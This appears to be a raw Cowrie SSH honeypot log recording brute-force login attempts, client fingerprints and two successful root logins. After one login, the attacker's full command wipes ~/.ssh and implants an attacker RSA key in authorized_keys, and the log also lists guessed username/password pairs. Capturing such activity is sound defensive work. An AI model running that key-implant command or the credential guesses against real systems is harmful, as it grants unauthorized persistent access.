{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:28:21.224452Z","src_ip":"134.199.174.250","session":"0c20ef6ad5e1"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123","message":"login attempt [pi/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:28:22.657136Z","src_ip":"134.199.174.250","session":"0c20ef6ad5e1"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:28:24.057940Z","src_ip":"134.199.174.250","session":"0c20ef6ad5e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":28433,"dst_ip":"1.2.3.4","dst_port":22,"session":"20ff78582e7b","protocol":"ssh","message":"New connection: 212.227.235.229:28433 (1.2.3.4:22) [session: 20ff78582e7b]","sensor":"my-vps","timestamp":"2025-09-08T13:28:47.942531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:28:47.943453Z","src_ip":"212.227.235.229","session":"20ff78582e7b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:28:48.368414Z","src_ip":"212.227.235.229","session":"20ff78582e7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38992,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b43bf2cf823","protocol":"ssh","message":"New connection: 212.227.235.229:38992 (1.2.3.4:22) [session: 9b43bf2cf823]","sensor":"my-vps","timestamp":"2025-09-08T13:28:48.374871Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:28:48.375659Z","src_ip":"212.227.235.229","session":"9b43bf2cf823"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:28:48.479908Z","src_ip":"212.227.235.229","session":"9b43bf2cf823"}
{"eventid":"cowrie.login.failed","username":"scpuser","password":"scpuser","message":"login attempt [scpuser/scpuser] failed","sensor":"my-vps","timestamp":"2025-09-08T13:28:49.071451Z","src_ip":"212.227.235.229","session":"9b43bf2cf823"}
{"eventid":"cowrie.login.failed","username":"dell","password":"12345678","message":"login attempt [dell/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T13:28:49.310426Z","src_ip":"212.227.235.229","session":"20ff78582e7b"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":44184,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb9920784d1f","protocol":"ssh","message":"New connection: 134.199.174.250:44184 (1.2.3.4:22) [session: bb9920784d1f]","sensor":"my-vps","timestamp":"2025-09-08T13:28:49.906837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:28:49.916784Z","src_ip":"134.199.174.250","session":"bb9920784d1f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:28:50.177394Z","src_ip":"212.227.235.229","session":"9b43bf2cf823"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:28:50.201099Z","src_ip":"134.199.174.250","session":"bb9920784d1f"}
{"eventid":"cowrie.login.failed","username":"pi","password":"qwerty123","message":"login attempt [pi/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:28:51.452921Z","src_ip":"134.199.174.250","session":"bb9920784d1f"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:28:51.590765Z","src_ip":"212.227.235.229","session":"20ff78582e7b"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:28:52.758069Z","src_ip":"134.199.174.250","session":"bb9920784d1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41668,"dst_ip":"1.2.3.4","dst_port":22,"session":"2585bdf70d5d","protocol":"ssh","message":"New connection: 212.227.235.229:41668 (1.2.3.4:22) [session: 2585bdf70d5d]","sensor":"my-vps","timestamp":"2025-09-08T13:28:55.791898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:28:55.792773Z","src_ip":"212.227.235.229","session":"2585bdf70d5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:28:56.702870Z","src_ip":"212.227.235.229","session":"2585bdf70d5d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50336,"dst_ip":"1.2.3.4","dst_port":22,"session":"22b5cca54674","protocol":"ssh","message":"New connection: 212.227.235.229:50336 (1.2.3.4:22) [session: 22b5cca54674]","sensor":"my-vps","timestamp":"2025-09-08T13:28:57.609098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:28:57.619772Z","src_ip":"212.227.235.229","session":"22b5cca54674"}
{"eventid":"cowrie.login.failed","username":"cacti","password":"0","message":"login attempt [cacti/0] failed","sensor":"my-vps","timestamp":"2025-09-08T13:28:57.647888Z","src_ip":"212.227.235.229","session":"2585bdf70d5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:28:57.932440Z","src_ip":"212.227.235.229","session":"22b5cca54674"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:28:58.878226Z","src_ip":"212.227.235.229","session":"2585bdf70d5d"}
{"eventid":"cowrie.login.success","username":"root","password":"g","message":"login attempt [root/g] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:28:59.177596Z","src_ip":"212.227.235.229","session":"22b5cca54674"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:28:59.859903Z","src_ip":"212.227.235.229","session":"22b5cca54674"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:28:59.860691Z","src_ip":"212.227.235.229","session":"22b5cca54674"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:28:59.861857Z","src_ip":"212.227.235.229","session":"22b5cca54674"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:00.170702Z","src_ip":"212.227.235.229","session":"22b5cca54674"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:29:00.850032Z","src_ip":"212.227.235.229","session":"22b5cca54674"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:29:00.850535Z","src_ip":"212.227.235.229","session":"22b5cca54674"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:29:01.167644Z","src_ip":"212.227.235.229","session":"22b5cca54674"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:01.168497Z","src_ip":"212.227.235.229","session":"22b5cca54674"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50350,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9d9c6b2688b","protocol":"ssh","message":"New connection: 212.227.235.229:50350 (1.2.3.4:22) [session: e9d9c6b2688b]","sensor":"my-vps","timestamp":"2025-09-08T13:29:01.464349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:29:01.470726Z","src_ip":"212.227.235.229","session":"e9d9c6b2688b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:29:01.783620Z","src_ip":"212.227.235.229","session":"e9d9c6b2688b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44716,"dst_ip":"1.2.3.4","dst_port":22,"session":"a26ccda77f0c","protocol":"ssh","message":"New connection: 212.227.235.229:44716 (1.2.3.4:22) [session: a26ccda77f0c]","sensor":"my-vps","timestamp":"2025-09-08T13:29:02.981854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:29:02.982923Z","src_ip":"212.227.235.229","session":"a26ccda77f0c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:29:03.021803Z","src_ip":"212.227.235.229","session":"e9d9c6b2688b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:29:03.105804Z","src_ip":"212.227.235.229","session":"a26ccda77f0c"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T13:29:03.634937Z","src_ip":"212.227.235.229","session":"a26ccda77f0c"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:04.331043Z","src_ip":"212.227.235.229","session":"e9d9c6b2688b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50352,"dst_ip":"1.2.3.4","dst_port":22,"session":"c61e94a45447","protocol":"ssh","message":"New connection: 212.227.235.229:50352 (1.2.3.4:22) [session: c61e94a45447]","sensor":"my-vps","timestamp":"2025-09-08T13:29:04.622056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:29:04.629380Z","src_ip":"212.227.235.229","session":"c61e94a45447"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:04.758539Z","src_ip":"212.227.235.229","session":"a26ccda77f0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:29:04.930132Z","src_ip":"212.227.235.229","session":"c61e94a45447"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:29:06.143532Z","src_ip":"212.227.235.229","session":"c61e94a45447"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:06.444667Z","src_ip":"212.227.235.229","session":"22b5cca54674"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:06.451509Z","src_ip":"212.227.235.229","session":"c61e94a45447"}
